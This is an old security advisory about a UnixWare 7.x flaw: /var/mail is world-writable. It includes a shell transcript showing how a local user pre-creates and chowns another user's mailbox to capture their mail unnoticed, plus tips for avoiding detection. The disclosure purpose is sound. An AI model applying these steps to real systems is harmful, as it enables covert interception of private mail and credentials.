COMMAND
mail
SYSTEMS AFFECTED
UnixWare 7.x
PROBLEM
Brock Tellier found following. Only UnixWare 7.1 was tested.
Imagine suprise if you saw that /var/mail is mode 777. As such,
any user may create a file called /var/mail/<username> with a
mode readable by him and trap all incoming mail. Afraid of
getting caught? chown the file to <username> leaving it still
world-readable, and no one will ever know who did it. All of this
assumes, of course, that the user has not recieved any mail yet.
If you keep track of your /etc/passwd file, you can monitor for
new entries and create the files as needed.
This permissions problem obviously opens the door for all sorts of
problems with symlinks and such. One would imagine that some mail
delivery programs which aren't as smart as sendmail will follow
symlinks in /var/mail. And as if all this wasn't bad enough,
UnixWare's /usr/bin/mail is a BIG LIE:
bash-2.02$ cat /usr/bin/mail
#!/bin/sh
cat > /dev/null
exit 0
bash-2.02$
Exploit:
bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier
Now wait for btellier to get some mail...
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier
bash-2.02$ cat btellier
From root Sat Dec 4 07:55:29 1999
Return-Path: root
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
From: root@localhost
Message-Id: <199912041355.HAA04842@localhost>
Status:
X-Status:
X-SCO-PAD: XXXXXX
X-SCO-UID: 1
Content-Length: 52
your ueber-secure password on 0wned.com is a@f9;se0
bash-2.02$
SOLUTION
Fix is out.